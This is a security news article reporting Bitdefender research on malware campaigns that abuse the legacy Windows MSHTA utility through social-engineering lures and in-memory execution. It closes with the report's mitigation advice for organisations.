MSHTA abuse helps malware hide in Windows processes

Bitdefender has published research on the use of Microsoft's MSHTA utility in malware attacks, focusing on a legacy Windows tool that remains enabled by default.

Attackers are using MSHTA to run malicious scripts through Microsoft-signed processes, making the activity appear more like normal Windows behaviour. Bitdefender linked the tool to campaigns involving malware families including LummaStealer, Amatera, CountLoader, Emmenhtal Loader, ClipBanker and PurpleFox.

MSHTA is a long-standing Windows utility tied to HTML Applications and Internet Explorer-era technology. Although Internet Explorer has been retired, the tool remains present on Windows systems, making it useful for cybercriminals seeking to avoid obvious malware binaries and instead abuse trusted software already installed on a machine.

Bitdefender has seen a rise in MSHTA-related detections in recent months. The report described this as part of a broader shift towards so-called living-off-the-land methods, in which attackers rely on legitimate administrative and scripting tools rather than custom executables that are more likely to trigger alarms.

In the campaigns Bitdefender reviewed, social engineering was a common entry point. Users were lured through fake software downloads, phishing links, Discord messages, ClickFix-style prompts, search-engine manipulation and fake human verification pages that encouraged them to copy and run malicious commands.

Some lures presented malware as cracked software, free applications or verification tools. Once a victim launched the process, MSHTA could retrieve further payloads from remote locations and execute them through multi-stage chains using HTA scripts, PowerShell and in-memory techniques.

This approach can make attacks harder to spot because fewer files are written to disk. Some malicious content was executed directly in memory, which can complicate analysis and reduce visibility for security monitoring tools.

The activity Bitdefender tracked ranged from credential theft to longer-term compromise of infected devices. Targets included browser-stored credentials, session cookies, cryptocurrency wallet data and financial information, while some operations also sought persistence and remote control of systems.

Legacy risk

The findings add to wider concern in the security industry about older Windows components that remain available after the products they were designed to support have been withdrawn. In this case, researchers argued that the continued presence of MSHTA leaves an opening for threat actors seeking to hide malicious actions inside ordinary operating system processes.

Australian organisations have faced persistent cyber risks linked to phishing, malvertising, credential theft and infostealer campaigns. The methods described in the report reflect those broader trends, particularly the use of deceptive websites and prompts that rely on user action rather than software exploits alone.

Security researchers have warned for several years that trusted native tools can give attackers an advantage because their presence is expected in many environments. When a threat actor uses a Windows component that administrators and software rely on for routine tasks, distinguishing hostile behaviour from legitimate activity becomes more difficult.

Mitigation steps

Organisations should consider restricting or disabling legacy scripting tools such as mshta.exe where possible, Bitdefender said. It also recommended moving older administrative scripts to modern alternatives and taking extra care with downloads, verification prompts and software obtained from untrusted sources.

The report comes as defenders continue to focus on attack chains that blend phishing, social engineering and native system tools. Rather than relying on a single malicious file, these campaigns increasingly spread execution across several stages, with each step designed to appear less suspicious than a conventional malware dropper.

For security teams, the challenge is not only detecting a specific utility but also identifying unusual sequences of behaviour around it, including script execution, remote payload retrieval and memory-based activity. The research suggests that as long as legacy components remain active by default, they are likely to remain part of the malware delivery toolkit.

Many of the attacks Bitdefender observed were designed "to minimise detection".